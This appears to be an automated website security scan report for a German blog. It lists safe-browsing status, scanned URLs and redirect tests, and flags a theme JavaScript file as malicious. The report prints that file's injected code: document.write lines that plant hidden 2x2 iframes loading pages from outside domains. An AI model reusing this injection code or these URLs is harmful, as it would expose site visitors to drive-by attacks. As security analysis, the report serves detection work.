Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rokblog.de
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rokblog.de/ | HTTP/1.1 301 Moved Permanently Cache-Control: private, max-age=0, pre-check=0 Connection: close Date: Wed, 14 Jan 2015 00:44:29 GMT Location: http://www.rokblog.de/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Wed, 13 Jul 2011 10:14:54 GMT Set-Cookie: PHPSESSID=1b7c722c8a671cdc69fdc03af99bbf26; path=/ X-Pingback: http://www.rokblog.de/xmlrpc.php | clean |
http://www.rokblog.de/ | 200 OK Content-Length: 92774 Content-Type: text/html | clean |
http://www.rokblog.de/wp-content/themes/ticklist.de/events.js | 200 OK Content-Length: 1015 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://adottareadistanza.org/chof.html?j=1127187></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bangkokescortmodel.com/zcmd.html?j=1127187></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.alt } catch(err) {} try { (s2blind)?pageTracker._trackEvent('c', 'sent', '2'):pageTracker._trackEvent('c', 'sent', '2'); } catch(err) {} try { (s3blind)?pageTracker._trackEvent('c', 'sent', '3'):pageTracker._trackEvent('c', 'sent', '3'); } catch(err) {} document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmi.html?j=1127187 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmi.html?j=1127187> Hidden iFrame found. size: 2x2 src: http://adottareadistanza.org/chof.html?j=1127187 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://adottareadistanza.org/chof.html?j=1127187> Hidden iFrame found. size: 2x2 src: http://bangkokescortmodel.com/zcmd.html?j=1127187 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://bangkokescortmodel.com/zcmd.html?j=1127187> Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html> | ||
http://rokblog.de/../2010/04/24/core-review/ | 400 Bad Request Content-Length: 226 Content-Type: text/html | clean |
http://rokblog.de/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://rokblog.de/../rokletter | 400 Bad Request Content-Length: 226 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rokblog.de
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: private, max-age=0, pre-check=0
Connection: close
Date: Wed, 14 Jan 2015 00:44:29 GMT
Location: http://www.rokblog.de/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 13 Jul 2011 10:14:54 GMT
Set-Cookie: PHPSESSID=1b7c722c8a671cdc69fdc03af99bbf26; path=/
X-Pingback: http://www.rokblog.de/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: rokblog.de
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: private, max-age=0, pre-check=0
Connection: close
Date: Wed, 14 Jan 2015 00:44:29 GMT
Location: http://www.rokblog.de/
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 13 Jul 2011 10:14:54 GMT
Set-Cookie: PHPSESSID=1b7c722c8a671cdc69fdc03af99bbf26; path=/
X-Pingback: http://www.rokblog.de/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rokblog.de
Referer: http://www.google.com/search?q=rokblog.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rokblog.de
Referer: http://www.google.com/search?q=rokblog.de
Result:
The result is similar to the first query. There are no suspicious redirects found.